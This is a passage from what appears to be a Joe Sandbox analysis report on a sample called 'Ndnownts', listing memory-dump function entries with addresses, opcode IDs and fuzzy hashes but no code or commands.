                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c81a07016e1d6d8393184bc7f8b53622a5f13fd5b092ac69f5c1c719c7d596a2
                                                                      • Instruction ID: 3faaf2e4cc7b3f734a5830be56f227260d705be2b0b577f7c55292260c0b25c5
                                                                      • Opcode Fuzzy Hash: c81a07016e1d6d8393184bc7f8b53622a5f13fd5b092ac69f5c1c719c7d596a2
                                                                      • Instruction Fuzzy Hash: 420116B0910259CFDB60CF58D858B9DBBF2FB08319F409495D149AB290DB706EC5CF51
                                                                      Function 05564638 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 79da95851188cbd449daa82e77d36c416e7ab9b5ff7a81c6c719bb2354ff2af9
                                                                      • Instruction ID: aab2250a743f6668a61a6712647e57af2cea19f51f41724301b5ef55a23b996b
                                                                      • Opcode Fuzzy Hash: 79da95851188cbd449daa82e77d36c416e7ab9b5ff7a81c6c719bb2354ff2af9
                                                                      • Instruction Fuzzy Hash: E0F03034409288EFCF12DFA0EC518DDBF75EB4A200F14849EE88457252CA325995DB92
                                                                      Function 05566438 Relevance: .0, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e46a0239e99160d12c98857363c1e1f95fe975a1d6be02c5e0df11c7d3d8c6a
                                                                      • Instruction ID: 5747e62a6a5bfc29c909d42a16b32ad3ad2608fd803b74c97f6d22b6369632b6
                                                                      • Opcode Fuzzy Hash: 3e46a0239e99160d12c98857363c1e1f95fe975a1d6be02c5e0df11c7d3d8c6a
                                                                      • Instruction Fuzzy Hash: BFF0E73190420AEBCF01DF99D8409EEBB79FF89320F00C519EA5967211D771A6A6DF90
                                                                      Function 00B69759 Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b8ea2ff3ea380ef81c82334cf534af32696661f730f0d0f15a817ffff600f08a
                                                                      • Instruction ID: 210229865f3ea29315a0f910e99ef1f4d231d7a6ac49382318583563244713cb
                                                                      • Opcode Fuzzy Hash: b8ea2ff3ea380ef81c82334cf534af32696661f730f0d0f15a817ffff600f08a
                                                                      • Instruction Fuzzy Hash: E5F0823095A284AEC751CF74A8057A87FFDEB02204F0450EAD085D7592DA791E44976A
                                                                      Function 055623D3 Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4578f846281fa906f785b4b7c9e3ef06f3db26350adf866c43377adb7576a692
                                                                      • Instruction ID: 38b929bba55b7f52f502a8f38c62662422380809571bf83377c68570bfc5b80e
                                                                      • Opcode Fuzzy Hash: 4578f846281fa906f785b4b7c9e3ef06f3db26350adf866c43377adb7576a692
                                                                      • Instruction Fuzzy Hash: 60F05E38A09248AFC750CBA8E8416E9BFB8FB49210F00C0EAA808D3381D6355A46CF91
                                                                      Function 05565D83 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d7ed4ae6bacc7683723ea4440142f12f81bd26594f6e20f7088d8c920ab5031b
                                                                      • Instruction ID: d3c696e075eaec54d6782f4a9e535c74562cf29d3368f84220bb7c1f28cbd5d4
                                                                      • Opcode Fuzzy Hash: d7ed4ae6bacc7683723ea4440142f12f81bd26594f6e20f7088d8c920ab5031b
                                                                      • Instruction Fuzzy Hash: BC01D074A001698FCB68DF54CD51BEDB7B1BB48300F1084999A09A7250DA715E859F44
                                                                      Function 05566F78 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2bd6d4b5d44cf613ec384945b7c2dfad65b0651ba33bb9e5e84d64cd910728a9
                                                                      • Instruction ID: ff7b866c6f81a0740a225208a58cb6dc0e945ed3c09ebf52d040d318ec6f8313
                                                                      • Opcode Fuzzy Hash: 2bd6d4b5d44cf613ec384945b7c2dfad65b0651ba33bb9e5e84d64cd910728a9
                                                                      • Instruction Fuzzy Hash: 7BF03A34909288EFCB45CFA8C811AEDBFB5FF49310F14C4AAE85497252C6359A12DF91
                                                                      Function 05565E14 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8eab42e7ec3606fda9a7e8cb30293751fbce0e822cfef35fffbb9db7d2afa5f4
                                                                      • Instruction ID: 14407d5b1915aac8e030faffd2f1e3f50a796d7d0e5d82c5452ad1ea1ad34a35
                                                                      • Opcode Fuzzy Hash: 8eab42e7ec3606fda9a7e8cb30293751fbce0e822cfef35fffbb9db7d2afa5f4
                                                                      • Instruction Fuzzy Hash: F301F2708012AACFDF20CF14C884F9CBBF2BB05301F4099E9C40AA3291D7759A86CF10
                                                                      Function 05564E32 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7620244ac8f7bd365eeb90389a484c536ce9c1041734f0136c9f199a85fbdfc0
                                                                      • Instruction ID: c34d05a5d08dea8cac2520cec0dd6123b813e05ceaa05c2bab6bad30ef439d59
                                                                      • Opcode Fuzzy Hash: 7620244ac8f7bd365eeb90389a484c536ce9c1041734f0136c9f199a85fbdfc0
                                                                      • Instruction Fuzzy Hash: 36F03A35909148EBCB05CF94D840AE9BFB5FB49300F108899A85553261C6328E56EB91
                                                                      Function 05560EC3 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2d7a6f4e038df29393ac57ff51ef194140bf1eb049780108280433c47cb60e87
                                                                      • Instruction ID: 861420b047ea6794438a6a4feea19cd4c9bd63238255c198795ff21e4f714e83
                                                                      • Opcode Fuzzy Hash: 2d7a6f4e038df29393ac57ff51ef194140bf1eb049780108280433c47cb60e87
                                                                      • Instruction Fuzzy Hash: 7FF05E34D09248AFC740DFA8D8406ADBBB8BB49200F00C0DAA848D7351C6345E01CF91
                                                                      Function 05563A98 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2aea6790b18c1296180ba596ed9055e56c123442310108b30dfe17ec09959f19
                                                                      • Instruction ID: 67e2167c31d15d084439ac66b3226764936233833a6cd5366add5c2de5d6f8cf
                                                                      • Opcode Fuzzy Hash: 2aea6790b18c1296180ba596ed9055e56c123442310108b30dfe17ec09959f19
                                                                      • Instruction Fuzzy Hash: EFF0827490A3C4AFC751DBB4980159CBFF8AF06200F2988DFD488C3652D6314985DB51
                                                                      Function 055626B0 Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2491672ebecc6c63f5ffd534f5387c7a57b9be2dba906f7e8a31bdfd9351de5f
                                                                      • Instruction ID: 41fbe8799ae1713d9cd8b5218a50f92c504bc89a8ccf20bbfe2bd16a97c559e1
                                                                      • Opcode Fuzzy Hash: 2491672ebecc6c63f5ffd534f5387c7a57b9be2dba906f7e8a31bdfd9351de5f
                                                                      • Instruction Fuzzy Hash: F1F05E7990D288AFC741DFA4C8105ECBFB5AF4A200F14C4DBEC9497252C6358A46DF91
                                                                      Function 055625A0 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6166ca32586c016f1f1dc546a48ecda3e720e51b38481b583e7bfeab2003f500
                                                                      • Instruction ID: fceeb59ec3c8fa214ccd527b47332767954f094f25a4c7053b564bd7b02e0c10
                                                                      • Opcode Fuzzy Hash: 6166ca32586c016f1f1dc546a48ecda3e720e51b38481b583e7bfeab2003f500
                                                                      • Instruction Fuzzy Hash: 75F0A77454E384AFC711DF64E8115D8BFB5AF06310F14809FD8C457252C6314986CBA2
                                                                      Function 05567F80 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 88a69d3ef53ceda57d4446cec7717b52927db43027d2c55dfef1c7ec1dd8d99f
                                                                      • Instruction ID: b69dee3e504dfca3171c9dc22f8c5910eee2a6f6027f34bc5d8b0aa557b1d7e4
                                                                      • Opcode Fuzzy Hash: 88a69d3ef53ceda57d4446cec7717b52927db43027d2c55dfef1c7ec1dd8d99f
                                                                      • Instruction Fuzzy Hash: 1BF01C74909149EFCB44CFA8D841BECFBB4FB48314F10C1A9E89457741CA359A96DF91
                                                                      Function 05563980 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ace74657a631f8c182c32495ddc8b0882abbb9636973f46d5704d09376f0f0a6
                                                                      • Instruction ID: abfc2624a9aea2313061e3491892da1db492725d4078f97e85695b7bc23e7d14
                                                                      • Opcode Fuzzy Hash: ace74657a631f8c182c32495ddc8b0882abbb9636973f46d5704d09376f0f0a6
                                                                      • Instruction Fuzzy Hash: A4F08C74C0A289EFCB01CFA4D9106ADBFB0AF4A200F28C5DFD88493352C6354A56DF51
                                                                      Function 05561C18 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 10338c4af8326fb14ad4fb9435d0d3f46c8ba29ea7aa267a928a81e2075be10d
                                                                      • Instruction ID: 3614fde5ddab71e5e1d5758d7e9e9ce772217cfe638f4dc21a9e9e33da33a05d
                                                                      • Opcode Fuzzy Hash: 10338c4af8326fb14ad4fb9435d0d3f46c8ba29ea7aa267a928a81e2075be10d
                                                                      • Instruction Fuzzy Hash: 17F09B3450E284AFC751DBB4DC116FCBFB8AF0B210F1444DBD88897252D6354A45CFA2
                                                                      Function 05567CD0 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93b9491b7a035bfa91c862cba7d6507cd7446c14c313eb42df6a96415efa5905
                                                                      • Instruction ID: 4eaf62401a3ef7ee5d2ee49cd6efdb274bff99419bf0c169f141d1ce01dd12ee
                                                                      • Opcode Fuzzy Hash: 93b9491b7a035bfa91c862cba7d6507cd7446c14c313eb42df6a96415efa5905
                                                                      • Instruction Fuzzy Hash: 19F08C38909289AFCB01CBA4D8519ECFFB4FF4A210F10C0EAEC5493351CA355A46DF91
                                                                      Function 05562898 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c4aaac47a08bdb438ca816d4e81925a8be3f0604a143cb12161ad66035b919a
                                                                      • Instruction ID: 46b50c88ba965fbf543bbe59e78ccac892a840f1fabb8aa47743658574358fc2
                                                                      • Opcode Fuzzy Hash: 1c4aaac47a08bdb438ca816d4e81925a8be3f0604a143cb12161ad66035b919a
                                                                      • Instruction Fuzzy Hash: A0F06574A0E384AFCB15DFA4DC10598BFB8AB46300F1494DFD88897252CA355D89CBA2
                                                                      Function 05563758 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a95abf7dc59d2ba93b3b9505de3d8e21b53d7147f6a913613775b88cbd7872fd
                                                                      • Instruction ID: 771c9e316d161b2d83bc60e4175ad47bac20b9be44fd24a053109fc3360280f0
                                                                      • Opcode Fuzzy Hash: a95abf7dc59d2ba93b3b9505de3d8e21b53d7147f6a913613775b88cbd7872fd
                                                                      • Instruction Fuzzy Hash: 7FF0657490E2C4AFD761CBB498011ECBFB4AB06104F1484DFD4C487253CA355A85DBA2
                                                                      Function 055681A8 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87bb220a39d3a538320bbbc5fada54b8cbccc6e0b65b49229c34af5c845492c6
                                                                      • Instruction ID: 0927fb4dcd65e8334f0b0b32811db841321f3ecc14897c660e71ade3a22c93c5
                                                                      • Opcode Fuzzy Hash: 87bb220a39d3a538320bbbc5fada54b8cbccc6e0b65b49229c34af5c845492c6
                                                                      • Instruction Fuzzy Hash: 1FE0D83490A108ABC704CFB8ED019EABFB8FB45314F1081AED80857381CA315E86CBA1
                                                                      Function 05563A19 Relevance: .0, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b37e8273f1636ce59dcb1fc8cf73e62b4495d1851d109b69c9e2a207811728b
                                                                      • Instruction ID: 345e3134ac014dcc02f7e2e41fdd1b03a6a98265302cfd9df0b396970708a8b3
                                                                      • Opcode Fuzzy Hash: 5b37e8273f1636ce59dcb1fc8cf73e62b4495d1851d109b69c9e2a207811728b
                                                                      • Instruction Fuzzy Hash: F2E0D83440E2C4AFD711CB649800599BF78AF07200B1454CFD48587653CA355D86D7A1
                                                                      Function 00B60978 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35cf28aa063cdc4ca2ab6b984a6aa552ef47e40b27f9574e7d45cc35a213a755
                                                                      • Instruction ID: 34555c085e462f5c63258bae34dbd2ff82e53f8dd42d26ee289fd9ce40e56f9b
                                                                      • Opcode Fuzzy Hash: 35cf28aa063cdc4ca2ab6b984a6aa552ef47e40b27f9574e7d45cc35a213a755
                                                                      • Instruction Fuzzy Hash: 4AF03930911708EFCB80EFA8D98569DBBF4FF85310F2081E9D505E7255E7705E48AB91
                                                                      Function 05568160 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 64eb378bbf6b7cd9f61725e76ee481fed079a9977e1ecbfa2c9512afe0b7f72d
                                                                      • Instruction ID: fbc45a0fa989d3cab7f25f59c65be983425dc77ca7881f79cf35ff373328ebb0
                                                                      • Opcode Fuzzy Hash: 64eb378bbf6b7cd9f61725e76ee481fed079a9977e1ecbfa2c9512afe0b7f72d
                                                                      • Instruction Fuzzy Hash: 46E02631A8610CABC780EFFCD8023CF3BF8EF45700F4048A6D44197222EA399A019B57
                                                                      Function 0556741A Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71c28bfd2995e12670c184304f86bbfe6979be0d02a9f0ec18806a2992b265af
                                                                      • Instruction ID: caecb99589b3946ca661645d0e3237c68dbf1f9f6ce6efa886a5c83983c34342
                                                                      • Opcode Fuzzy Hash: 71c28bfd2995e12670c184304f86bbfe6979be0d02a9f0ec18806a2992b265af
                                                                      • Instruction Fuzzy Hash: F3F0E2309093598FCB50CF28D898A89BBF1FF19324F0185D59448A7262CBB4A9C6CF60
                                                                      Function 00B6E398 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26b4dd719f6587bcde2240a6069d0574c92c83924f1c90957b4563e56769c8c7
                                                                      • Instruction ID: 3b69d50df56df93811f205413e8b1cb92f3a4f3dbb21ecd651b7be8db66a012d
                                                                      • Opcode Fuzzy Hash: 26b4dd719f6587bcde2240a6069d0574c92c83924f1c90957b4563e56769c8c7
                                                                      • Instruction Fuzzy Hash: 34F0C978E05208EFCB85DFA8D841A9DFBF5FB58310F10C1AAAC1993350D6359A55DF40
                                                                      Function 05565031 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed29cf553fa76377adcd53e643bd05702ac2732d35d4ef7718d4981c335cbdfe
                                                                      • Instruction ID: 1e6abc24618ffe30e5cfbb51315070908af5d9e8e435144e592c5b31eb98220c
                                                                      • Opcode Fuzzy Hash: ed29cf553fa76377adcd53e643bd05702ac2732d35d4ef7718d4981c335cbdfe
                                                                      • Instruction Fuzzy Hash: CCF0FF748012A9CFDB20CF14C984B98BBF2BB48301F4085E9D40AA3250D7759F86CF10
                                                                      Function 05562020 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 680b45df858a69e4cbc447f1ef1c714a7d0fa28750f456b1b996787130299369
                                                                      • Instruction ID: e2be072bcd5f05b3735725db3d55e8cf5f89ae800aafeb012d0a5d490ccaa784
                                                                      • Opcode Fuzzy Hash: 680b45df858a69e4cbc447f1ef1c714a7d0fa28750f456b1b996787130299369
                                                                      • Instruction Fuzzy Hash: A9E06D3454E385DFC792CBA898045AA3FB4AB07230F1047CA94659B1F2C6282A46C792
                                                                      Function 055687BA Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30d38c85ce94649f1c6522e6cc0c4aa7c7d6efdf0bcd130912eec00fa488b871
                                                                      • Instruction ID: 8ae3c9276b58dfc7d9ed65dfa60ccfa9e404ccb9a223582c7e5fd42b305e6980
                                                                      • Opcode Fuzzy Hash: 30d38c85ce94649f1c6522e6cc0c4aa7c7d6efdf0bcd130912eec00fa488b871
                                                                      • Instruction Fuzzy Hash: 11E04F38A09108EBC704DFA8ED45BEDBBB8BB45304F249098A84467340CA32AE42CB95
                                                                      Function 05568E08 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3353f69d000c83ff6c5e1bda04ac90c1f4b6a205de668ddb47e1fc46ee730d79
                                                                      • Instruction ID: 3a357511db697d007c1e4b1903b44152c91632d771d58e3beacaadd7b98bf4c9
                                                                      • Opcode Fuzzy Hash: 3353f69d000c83ff6c5e1bda04ac90c1f4b6a205de668ddb47e1fc46ee730d79
                                                                      • Instruction Fuzzy Hash: 87E0CDB650E148AFC750C7E4EC12AF57FBCEB46214F04D099A80887251DA39DE42CBA1
                                                                      Function 00B69768 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25e5127a9db01b278559f2cf190623971c4487580c6e91a148c7070d61cf6cbf
                                                                      • Instruction ID: 9a8112926a1018fe2e2e488832fbe3fc31a13dd7df0ecd06fc911c2540b025d8
                                                                      • Opcode Fuzzy Hash: 25e5127a9db01b278559f2cf190623971c4487580c6e91a148c7070d61cf6cbf
                                                                      • Instruction Fuzzy Hash: E8E0DF3095A248EFC740DFB4E9043B87BEEEB06304F0090E8D045D32A1EB7A1E009B59
                                                                      Function 06C960A0 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1bcc501196fcc3fc75a6fe7ba0c4ed596520ba4f057eb50b2f8fb5b68e5e2ccf
                                                                      • Instruction ID: cb9d1ccdf901bfd99ab964c1cc1b9bd7174435d6a903c883f6d6d4c88bf8036c
                                                                      • Opcode Fuzzy Hash: 1bcc501196fcc3fc75a6fe7ba0c4ed596520ba4f057eb50b2f8fb5b68e5e2ccf
                                                                      • Instruction Fuzzy Hash: 60E0ED74E05208EFCB84DFA9D84469CFBF4EB48310F10C0A9981893351D6359A55DF95
                                                                      Function 06C9D990 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
